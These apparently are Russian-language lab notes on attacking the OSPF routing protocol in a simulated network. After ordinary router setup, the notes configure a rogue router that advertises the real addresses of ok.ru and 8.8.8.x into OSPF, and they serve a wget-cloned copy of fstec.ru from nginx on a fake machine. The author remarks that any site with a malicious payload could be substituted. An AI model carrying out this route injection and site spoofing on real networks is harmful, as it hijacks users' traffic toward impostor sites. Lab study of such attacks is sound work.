###### tags: `Attack`
# **Атаки на протокол динамической маршрутизации**

Задача - настроить перенаправление трафика на вредоносную машину


Сегмент с атакующей машиной
1. Настраиваем интернет на C-R4:
> C-R4#int e0/1 #настраиваем интерфейс, выдаем адрес и маску
> C-R4#ip address 11.0.5.4 255.255.255.0
> C-R4#ip nat inside # адрес будет преобразовываться на интерфейс для получения интернета
> C-R4#no sh #включаем интерфейс
> Аналогичным образом настраиваем оставшиеся e0/2, e0/0
> C-R4#int e0/2
> C-R4#ip address 11.0.8.4 255.255.255.0
> C-R4#ip nat inside
> C-R4#no sh
> C-R4#int e0/0
> C-R4#ip address 11.0.6.4 255.255.255.0
> C-R4#ip nat inside
> C-R4#no sh
> C-R4#int e0/3
> C-R4#ip address dhcp
> C-R4#ip nat outside #настраиваем преобразование адресов для выхода в интернет
Настраиваем OSPF-маршрутизацию:
> C-R4#router ospf 1
> C-R4#redistribute connected subnets
> C-R4#redistribute static subnets
> C-R4#network 11.0.5.0 0.0.0.255 area 0
> C-R4#network 11.0.6.0 0.0.0.255 area 0
> C-R4#network 11.0.8.0 0.0.0.255 area 0
> C-R4#default-information originate always metric 1 #указываем всем роутерам что у C-R4 есть выход в интернет
> C-R4#do wr #сохраняем
2. Настраиваем интерфейсы на C-R5:
> C-R5#interface Ethernet0/0
> C-R5#int e0/1
> C-R5#ip address 11.0.2.5 255.255.255.0
> C-R5#no sh
> C-R5#int e0/2
> C-R5#ip address 11.0.8.5 255.255.255.0
> C-R5#no sh
> C-R5#int e0/0
> C-R5#ip address 11.0.7.5 255.255.255.0
> C-R5#no sh
Настраиваем OSPF-маршрутизацию:
> C-R5(config)#router ospf 1
> C-R5(config)#redistribute connected subnets
> C-R5(config)#redistribute static subnets
> C-R5(config)#network 11.0.2.0 0.0.0.255 area 0
> C-R5(config)#network 11.0.7.0 0.0.0.255 area 0
> C-R5(config)#network 11.0.8.0 0.0.0.255 area 0
> C-R5(config)#do wr #сохраняем
> C-R4(config)#no ip domain-lookup #чтобы обращался сразу к ip, не запрашивая DNS
> ###можно одновременнно сделать команды на интерфейсах e0/0-2 : int range e0/0-2
Для NAT прописываем access-list на C-R4:
> C-R4(config)#access-list 1 permit any #все разрешаем
> C-R4(config)#ip nat inside source list 1 interface ethernet 0/3 #вешаем на интерфейс
3. Настраиваем C-R10:
> C-R10(config)#router ospf 1
> C-R10(config)#redistribute connected subnets
> C-R10(config)#redistribute static subnets
> C-R10(config)#network 11.0.1.0 255.255.255.0 area 0
> C-R10(config)#network 11.0.2.0 255.255.255.0 area 0
> C-R10(config)#network 11.0.3.0 255.255.255.0 area 0
> C-R10(config)#network 11.0.9.0 255.255.255.0 area 0
> C-R10(config)#do wr #сохраняем
Также как и на роутере C-R4 приводим интерфейсы C-R10 к виду:
> interface Ethernet0/0
> ip address 13.2.0.10 255.255.255.0
>
> interface Ethernet0/1
> ip address 11.0.1.10 255.255.255.0
>
> interface Ethernet0/2
> ip address 11.0.3.10 255.255.255.0
>
> interface Ethernet0/3
> ip address 11.0.2.10 255.255.255.0
>
> interface Ethernet1/0
> ip address 11.0.9.10 255.255.255.0
Проверяем какие есть маршруты командой **sh ip ro**
4. Настраиваем Fake-Router:
> прервать traceroute - **ctrl+shift+6**
> перевести интерфейс в full duplex - **du fu**
Попробуем подменить сайт ok.ru, пингуем его, получаем адрес:

Интерфейсы должны быть настроены таким образом:
> interface Ethernet0/0
> ip address 11.0.9.20 255.255.255.0
>
> interface Ethernet0/1
> ip address 217.20.155.13 255.255.255.0 secondary #подставляем адрес ok.ru
> ip address 8.8.8.20 255.255.255.0
Таким же образом настраиваем ospf:
> router ospf 1
> redistribute connected subnets
> network 11.0.9.0 0.0.0.255 area 0
Далее, назначаем 217.20.155.13, 8.8.8.20 на Linux роутере в фейковом сегменте сети:
> nano /etc/network/interfaces

> service networking restart #перезагружаем сеть
К примеру, делаем трассировку маршрута до 8.8.8.8 с C-R1 и видим, что трассировка ведет к нашему фейковому адресу:

Далее, скачаем утилиту для выгрузки полной версии какого-либо сайта, который потом вставим.
Редактируем на фейковой linux-машине файл resolv.conf
> nano /etc/resolv.conf
> nameserver 1.1.1.1 # для доступа к сети
> Обновляем - **apt update**
> Ставим nginx - **apt install nginx**
> Копируем сайт целиком в папку /var/www - **wget -r -k -l 7 -p -E -nc https://www.fstec.ru/**
Прописываем в сервере nginx
> nano /etc/nginx/sites-enabled/default
> root /var/www/www.fstec.ru
> service nginx restart
**Для примера я вместо сайта ok.ru, выкачал сайт fstec.ru, можно скачать сайт ok.ru либо любой другой с вредоносной нагрузкой.**
Настраиваем kali-linux
>nano /etc/resolv.conf
>nameserver 1.1.1.1


C-R6
int e0/3
ip address 12.0.20.6 255.255.255.0

Перенаправление ведет к вредоносной машине
> Что мы видим: при обращении на ok.ru с kali-linux у нас открывается выгруженная страничка сайта fstec.ru
